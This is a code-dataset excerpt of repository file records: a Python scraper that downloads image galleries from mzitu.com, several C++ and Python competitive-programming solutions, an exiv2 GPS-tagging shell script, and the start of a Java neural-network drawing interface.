[ { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 25.33333396911621, "blob_id": "b4b9e010b7a81d910dc57687afdf0416ec6145b2", "content_id": "56a3f5d5f20396cc1e76902692279a89ebcb4d6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 95, "license_type": "no_license", "max_line_length": 46, "num_lines": 3, "path": "/README.md", "repo_name": "Zhang-Jikang/python_study", "src_encoding": "UTF-8", "text": "# python_study\na record during the process of studying python\n## 增加用xpath爬取的实例\n" }, { "alpha_fraction": 0.4896829426288605, "alphanum_fraction": 0.5520885586738586, "avg_line_length": 37, "blob_id": "2f55764221e5eada07434ee1ca9d910f0e95ea01", "content_id": "67be0bef89e39afa1c9d5e1943dc11a5efa56f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2065, "license_type": "no_license", "max_line_length": 147, "num_lines": 51, "path": "/mzitu_xpath.py", "repo_name": "Zhang-Jikang/python_study", "src_encoding": "UTF-8", "text": "import requests, os\r\nfrom lxml import etree\r\n\r\nburl = 'http://www.mzitu.com/mm/page/%s/'\r\n\r\nheaders = {\r\n 'Cookie': 'Hm_lvt_dbc355aef238b6c32b43eacbbf161c3c=1566636133; Hm_lpvt_dbc355aef238b6c32b43eacbbf161c3c=1566636133',\r\n 'Referer': 'http://www.mzitu.com/xinggan/',\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',\r\n}\r\n\r\nfor i in range(1, 32):\r\n url = burl % i\r\n response = requests.get(url, headers=headers)\r\n html_ele = etree.HTML(response.text)\r\n pins = html_ele.xpath('.//ul[@id=\"pins\"]/li')\r\n\r\n for abiaoqian in pins:\r\n\r\n aname = abiaoqian.xpath('./span[1]/a')[0].text # 获取一组图片的名字\r\n # print(aname)\r\n\r\n if not os.path.exists(aname):\r\n os.mkdir(aname) # 保存图片名字 创建文件夹\r\n\r\n tuurl = abiaoqian.xpath('./a/@href')[0] # 获取到一组图片的全部 url\r\n # print(tuurl)\r\n res 
= requests.get(tuurl, headers=headers)\r\n htmls = etree.HTML(res.text)\r\n\r\n url_max = htmls.xpath('//div[@class=\"pagenavi\"]/a/@href')[-2].split('/')[-1] # 获取图片最大页码数\r\n # print(url_max)\r\n\r\n for x in range(1, int(url_max) + 1):\r\n # print(x)\r\n htmltu = tuurl + '/%s' % x\r\n # print(htmltu)\r\n h1_ele = requests.get(htmltu, headers=headers)\r\n h2 = etree.HTML(h1_ele.text)\r\n tupiandizhi = h2.xpath('//div[@class=\"main-image\"]/p/a/img/@src')[0]\r\n # print(tupiandizhi)\r\n jpg_name = '{}/'.format(aname) + tupiandizhi.split('/')[-1]\r\n headerss = {\r\n 'Referer': tuurl,\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'\r\n }\r\n img = requests.get(tupiandizhi, headers=headerss)\r\n # print(img)\r\n with open(jpg_name, 'wb') as f:\r\n f.write(img.content)\r\n # print(jpg_name)" } ]
2
Igorjan94/CF
https://github.com/Igorjan94/CF
fbbda0037a866ebab33efe2db49b67302e420c37
816648a3a8e310e790e43b9c62a56ae6cc273844
ea3f27b607f017e6a975ddfa63c9d1eaa649c7ea
refs/heads/master
2023-08-08T19:13:14.785199
2023-08-08T18:44:22
2023-08-08T18:44:22
19,123,715
0
0
null
2014-04-24T20:52:42
2020-12-30T20:41:42
2020-12-30T20:41:40
C++
[ { "alpha_fraction": 0.5230769515037537, "alphanum_fraction": 0.6061538457870483, "avg_line_length": 28.545454025268555, "blob_id": "44cd1cef0952bc0231667416bca617d350caff6f", "content_id": "64e8147c837e6af048671bde6d30b8ab56446591", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 325, "license_type": "no_license", "max_line_length": 86, "num_lines": 11, "path": "/scripts/updateExif.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nlat=\"${1/[.,]/}\"\nlong=\"${2/[.,]/}\"\ncd \"$3\"\n\nexiv2 -v\\\n -M\"set Exif.GPSInfo.GPSLatitude $lat/1000000 0/1 0/1\"\\\n -M\"set Exif.GPSInfo.GPSLatitudeRef N\"\\\n -M\"set Exif.GPSInfo.GPSLongitude $long/1000000 0/1 0/1\"\\\n -M\"set Exif.GPSInfo.GPSLongitudeRef E\" *.JPG *JPEG *.jpg *.jpeg *.MOV *.MP4 *.TIF;\n" }, { "alpha_fraction": 0.4443882703781128, "alphanum_fraction": 0.45500504970550537, "avg_line_length": 37.03845977783203, "blob_id": "e4b45d6b6d0b2b7d26dcd332adaace9fac9c5316", "content_id": "becc63e5078c46eabd143eac4159c531bc4d2f45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1978, "license_type": "no_license", "max_line_length": 928, "num_lines": 52, "path": "/CodeForce/0285/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> l, r;\nvector<bool> b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, 
c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n scanf(\"%I64d\", &x);\n if (x > 0 && x <= n)\n {\n if (b[x])\n l.push_back(-x);\n b[x] = true;\n } else\n {\n if (x <= 0)\n l.push_back(-x); else\n r.push_back(-x);\n }\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n int n, k;\n readln(n, k);\n for (int i = k + 1; i >= 1; i--)\n printf(\"%d%c\", i, ' ');\n for (int i = k + 2; i <= n; i++)\n printf(\"%d%c\", i, i == n ? '\\n' : ' ');\n return 0;\n}\n" }, { "alpha_fraction": 0.5615577697753906, "alphanum_fraction": 0.5801507830619812, "avg_line_length": 33.31034469604492, "blob_id": "06d64eac5316dd3bf631fb420b32b853c1270be0", "content_id": "c18ab81fffd280abae69e718d805cc4e295df51f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3980, "license_type": "no_license", "max_line_length": 163, "num_lines": 116, "path": "/CodeForce/1057/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n#define SZ(a) int(a.size())\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INF = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nstruct edge {\n\tint to, price, dist;\n\n bool operator<(edge const& b) const {\n return tuple(dist, price, to) < tuple(b.dist, b.price, b.to);\n }\n};\n\nvoid add_edge(vector<vector<edge>>& g, int from, int to, int price, int dist) {\n\tg[from].push_back({to, price, dist});\n}\n\nvoid run()\n{\n vector<vector<int>> d(2500, vector<int>(50, MOD));\n string a;\n queue<pii> q;\n\tints(n, start, k); --start;\n\tvector<int> r(n);\n\treadln(r, a);\n fori(n)\n d[r[i]][i] = abs(start - i),\n q.push({r[i], i});\n while (q.size())\n {\n auto [c, i] = q.front(); q.pop();\n forj(n)\n if (int temp = d[c][i] + abs(i - j); a[i] != a[j] && r[j] > r[i] && temp < d[c + r[j]][j])\n d[c + r[j]][j] = temp,\n q.push({c + r[j], j});\n }\n int ans = MOD;\n fori(n)\n FOR(j, k, 2500)\n ans = min(ans, d[j][i]);\n writeln(ans == MOD ? 
-1 : ans);\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&& a){cout<<\" \"<<a;}\nttti void priws(T&& a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.3986014127731323, "alphanum_fraction": 0.4335664212703705, "avg_line_length": 13.300000190734863, "blob_id": "79f1e3aacfdb53ea7513ccfa91c2ece12596ef65", "content_id": "c43b65b6f6e48d0f1296afd2bcce75dd8e9bfa16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 33, "num_lines": 10, "path": "/CodeForce/0746/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a = int(input())\nb = int(input())\nc = int(input())\nx = 0\n\nfor i in range(a + 1):\n if i * 2 <= b and i * 4 <= c:\n x = i\n\nprint(x * 7)\n" }, { "alpha_fraction": 0.4659813940525055, "alphanum_fraction": 0.4867841303348541, "avg_line_length": 29.721803665161133, "blob_id": 
"8704ad92f835ee607868b648c8ad92ac69e7fa18", "content_id": "0fb6090c628e63e825fc86285fcc0f0810b6040b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4086, "license_type": "no_license", "max_line_length": 174, "num_lines": 133, "path": "/CodeForce/1349/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nstatic const int N = 1002001;\nvoid run()\n{\n int n, m, t;\n scanf(\"%d%d%d\", &n, &m, &t);\n bitset<N> x;\n auto get = [&](const bitset<N>& x, int i, int j) {\n return x[i * m + j];\n };\n auto set = [&](bitset<N>& x, int i, int j, bool y) {\n if (y)\n x.set(i * m + j);\n };\n fori(n)\n {\n string s(m, '0');\n scanf(\"%s\", s.data());\n forj(m)\n set(x, i, j, s[j] - '0');\n }\n unordered_map<bitset<N>, int> mp = {{x, 0}};\n\tvector<bitset<N>> v = {x};\n v.reserve(128);\n vector<pii> d = {{-1, 0}, {1, 0}, {0, -1}, {0, 1}};\n int cycle = -1;\n int start = -1;\n int index = 1;\n\twhile (true)\n\t{\n\t\tbitset<N> y;\n\t\tfori(n)\n\t\t\tforj(m)\n\t\t\t{\n int other = 0;\n bool color = get(x, i, j);\n for (const auto& [dx, dy]: d)\n if (int u = i + dx, v = j + dy; u >= 0 && u < n && v >= 0 && v < m && other == 0)\n other += get(x, u, v) == color;\n if (other == 0)\n set(y, i, j, color);\n else\n set(y, i, j, !color);\n\t\t\t}\n if (false)\n {\n writeln(index);\n fori(n)\n {\n forj(m)\n priws(get(y, i, j));\n writeln();\n }\n writeln();\n }\n v.pb(y);\n if (auto it = mp.find(y); it != mp.end())\n {\n cycle = index - it->second;\n start = it->second;\n break;\n }\n mp[y] = index++;\n x = y;\n\t}\n forn(q, t)\n {\n ll p;\n ll index;\n int i, j;\n scanf(\"%d%d%lld\", &i, &j, &p);\n if (p <= start)\n index = p;\n else\n index = (p - start) % cycle + start;\n //writeln(index);\n printf(\"%d\\n\", get(v[index], --i, --j));\n }\n}\n\n//{{{\nint main()\n{\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* 
=nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.37418708205223083, "alphanum_fraction": 0.39569786190986633, "avg_line_length": 19.397958755493164, "blob_id": "0b8d0cc520eac1b866c7e0d6567333d4186c57a0", "content_id": "e149294ed0dee55418c4a53d78ecc90027ce11e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1999, "license_type": "no_license", "max_line_length": 45, "num_lines": 98, "path": "/2022/yandexBackendQual/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ndef fromChar(c):\n if ord(c) < 65:\n return ord(c) - 48\n else:\n return ord(c) - 65 + 10\n\ndef cmp(s, t):\n ls = len(s)\n lt = len(t)\n if ls < lt:\n return True\n if ls > lt:\n return False\n for i in range(ls - 1, -1, -1):\n if s[i] < t[i]:\n return True\n return False\n\ndef get(s, t, b):\n vs = s[1:]\n vt = t[1:]\n if s[0] == t[0]:\n return [s[0]] + add(vs, vt, b)\n elif s[0] == '-':\n return sub(vt, vs, b)\n else:\n return sub(vs, vt, b)\n\ndef add(s, t, b):\n # print('ADD', s, t, b)\n ls = len(s)\n lt = len(t)\n ans = []\n carry = 0\n for i in range(max(ls, lt)):\n l = 0 if i >= ls else s[i]\n r = 0 if i >= lt else t[i]\n c = carry + l + r\n ans.append(c % b)\n carry = c // b\n if carry != 0:\n ans.append(carry)\n # print('RES', ans)\n return ans\n\ndef sub(s, t, b):\n # print('SUB', s, t, b)\n ans = ['+']\n if cmp(s, t):\n ans = ['-']\n s, t = t, s\n ls = len(s)\n lt = 
len(t)\n\n for i in range(max(ls, lt)):\n l = 0 if i >= ls else s[i]\n r = 0 if i >= lt else t[i]\n c = l - r\n if c < 0:\n s[i + 1] -= 1\n c += b\n ans.append(c)\n while len(ans) > 2 and ans[-1] == 0:\n ans.pop()\n\n # print('RES', ans)\n return ans\n\n\ndef calc(s, b):\n res = [['+', 0]]\n nxt = ['+']\n s += '+'\n for c in s:\n if c == '+' or c == '-':\n res.append([nxt[0]] + nxt[:0:-1])\n nxt = [c]\n else:\n cur = fromChar(c)\n if cur >= b:\n return False\n nxt.append(cur)\n # res.sort()\n for i in range(1, len(res)):\n res[0] = get(res[0], res[i], b)\n return res[0]\n\nl, r = input().replace(' ', '').split('=')\nfor b in range(2, 27 + 10):\n ll = calc(l, b)\n rr = calc(r, b)\n # print(b, ll, rr)\n if ll and rr and ll == rr:\n print(b)\n sys.exit()\nprint(-1)\n" }, { "alpha_fraction": 0.4026622176170349, "alphanum_fraction": 0.44592344760894775, "avg_line_length": 17.212121963500977, "blob_id": "a24041ca07304e7ee32926e2e135b803a39defa7", "content_id": "f1ecfd8a21960059ef59b4818f203cf67a9739a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 601, "license_type": "no_license", "max_line_length": 35, "num_lines": 33, "path": "/2017/newYear/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ndef get(c):\n if c <= 9:\n return chr(48 + c)\n elif c <= 35:\n return chr(97 + c - 10)\n else:\n return chr(65 + c - 36)\n\nx = int(input())\nn = int(input())\na = list(map(int, input().split()))\ndeg = [1] * n\nans = ''\n\nfor i in range(1, n):\n deg[i] = a[i - 1] * deg[i - 1]\n\nfor i in range(n):\n count = x // deg[n - i - 1]\n if count >= a[n - i - 1]:\n count = a[n - i - 1] - 1\n ans += get(count)\n x -= count * deg[n - i - 1]\n\nif x != 0:\n print('Error')\nelse:\n index = 0\n while ans[index] == '0':\n index += 1\n print(ans[index:])\n" }, { "alpha_fraction": 0.4305780529975891, "alphanum_fraction": 0.4511075019836426, "avg_line_length": 30.64102554321289, "blob_id": 
"c1ecb5462742ddb8be6858bee4d67718a3b8f556", "content_id": "f84b37d961a9c0175e4f00fb088a6e96583c2730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3702, "license_type": "no_license", "max_line_length": 928, "num_lines": 117, "path": "/TopCoder/TC602/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\n#define CLASSNAME BlackBoxDiv2\n#define METHODNAME count\n#define PARAMETRES string a, string b\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void 
readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nbool IsOdd (char c)\n{\n return c == 'B';\n}\n\nclass CLASSNAME\n{\n\n public :\n int METHODNAME(PARAMETRES)\n {\n int aa = count_if(a.begin(), a.end(), IsOdd);\n int bb = count_if(b.begin(), b.end(), IsOdd);\n if (aa == 0 ^ bb == 0)\n return 0;\n if (aa == 0 && bb == 0)\n return 1;\n if (aa == 1 || bb == 1)\n return 1;\n aa = min(aa, bb);\n bb = max(aa, bb);\n\n }\n};\n\nvoid run()\n{\n int\n sum(s 0..n binomial(n, s)*(-1)^s*2^((n-s)*n)*(1-2^(-n+s))^n\n\n string a, b;\n CLASSNAME ss;\n cout << ss.METHODNAME(a, b) << \"\\n\";\n vector<vi> s;\n int count = 0;\n int d = 4;\n\n s.resize(d);\n forn(i, d)\n s[i].resize(d);\n forn(i, (int)pow(2, d * d))\n {\n forn(k, d)\n forn(j, d)\n s[k][j] = i & (int)pow(2, d * d - 1 - k - j * d);\n\n/* forn(k, d)\n forn(j, d)\n printf(\"%d%c\", s[k][j], j == d - 1 ? 
'\\n' : ' ');\n enter;*/\n/* s[0][0] = i & 256;\n s[0][1] = i & 128;\n s[0][2] = i & 64;\n s[1][0] = i & 32;\n s[1][1] = i & 16;\n s[1][2] = i & 8;\n s[2][0] = i & 4;\n s[2][1] = i & 2;\n s[2][2] = i & 1;*/\n int ans = 0;\n forn(i, d)\n {\n int k = 0;\n forn(j, d)\n k += s[i][j];\n if (k >= 1)\n ans++;\n }\n forn(i, d)\n {\n int k = 0;\n forn(j, d)\n k += s[j][i];\n if (k >= 1)\n ans++;\n }\n if (ans == d + d)\n count++;\n }\n writeln(count);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".txt\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.29113924503326416, "alphanum_fraction": 0.3670886158943176, "avg_line_length": 18.75, "blob_id": "50b0524151f59a5fb4b1901310f2ab40ff0b55a2", "content_id": "37ae0b99109bfc57b6490cc60bebf7d366679ae8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/CodeForce/1645/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 2 * 10 ** 5\nprint(n)\nprint('a' * (n - 1) + 'z')\nprint('a' * (n - 1) + 'z')\n" }, { "alpha_fraction": 0.5879797339439392, "alphanum_fraction": 0.6010137796401978, "avg_line_length": 24.30476188659668, "blob_id": "b3de45fa2f6c9f274e242332326e78a758b25b78", "content_id": "44838e6a76033da1a0488719af351b166d8850b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2762, "license_type": "no_license", "max_line_length": 84, "num_lines": 105, "path": "/study/task7/DrawViz.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.awt.BasicStroke;\r\nimport java.awt.Color;\r\nimport java.awt.Graphics2D;\r\nimport java.awt.event.MouseAdapter;\r\nimport java.awt.event.MouseEvent;\r\nimport java.awt.geom.Line2D;\r\nimport java.awt.image.BufferedImage;\r\nimport 
java.io.File;\r\nimport java.io.IOException;\r\n\r\nimport javax.swing.ImageIcon;\r\nimport javax.swing.JFrame;\r\nimport javax.swing.JLabel;\r\nimport javax.swing.JPanel;\r\nimport javax.swing.WindowConstants;\r\n\r\npublic class DrawViz extends JFrame {\r\n\tstatic void writeln(Object o) {\r\n\t\tSystem.out.println(o);\r\n\t}\r\n\r\n\tint n = IOUtils.imageLength, m = n * 25;\r\n\tint cnt;\r\n\tint lastX = -1, lastY = -1;\r\n\tBufferedImage canvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\r\n\tpublic DrawViz(final ArtificialNeuralNetwork ann) {\r\n\r\n\t\tcanvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\t\tfinal JLabel label = new JLabel();\r\n\t\tlabel.setIcon(new ImageIcon(canvas));\r\n\t\tJPanel mainPanel = new JPanel();\r\n\t\tmainPanel.add(label);\r\n\t\tadd(mainPanel);\r\n\t\tsetBounds(84, 84, m + 42, m + 42);\r\n\r\n\t\tlabel.addMouseListener(new MouseAdapter() {\r\n\t\t\t@Override\r\n\t\t\tpublic void mousePressed(MouseEvent e) {\r\n\t\t\t\tsetTitle(e.getButton() + \" \" + lastX + \" \" + lastY);\r\n\t\t\t\tswitch (e.getButton()) {\r\n\t\t\t\tcase 1: {\r\n\t\t\t\t\tint curX = e.getX(), curY = e.getY();\r\n\t\t\t\t\tif (lastX != -1 && lastY != -1) {\r\n\r\n\t\t\t\t\t\tGraphics2D g = (Graphics2D) canvas.getGraphics();\r\n\t\t\t\t\t\tg.setColor(Color.WHITE);\r\n\t\t\t\t\t\tg.setStroke(new BasicStroke(m / n));\r\n\t\t\t\t\t\tg.draw(new Line2D.Float(lastX, lastY, curX, curY));\r\n\t\t\t\t\t\trepaint();\r\n\r\n\t\t\t\t\t}\r\n\t\t\t\t\tlastX = curX;\r\n\t\t\t\t\tlastY = curY;\r\n\t\t\t\t}\r\n\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 2: {\r\n\t\t\t\t\tdouble[] matrix = new double[n * n];\r\n\t\t\t\t\tint s = m / n;\r\n\t\t\t\t\tfor (int y = 0; y < m; y++) {\r\n\t\t\t\t\t\tfor (int x = 0; x < m; x++) {\r\n\t\t\t\t\t\t\tmatrix[(x / s) + (y / s) * n] += canvas.getRGB(x, y) & 0xFF;\r\n\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tfor (int y = 0, i = 0; y < n; y++) {\r\n\t\t\t\t\t\tfor (int x = 0; x < n; x++, i++) 
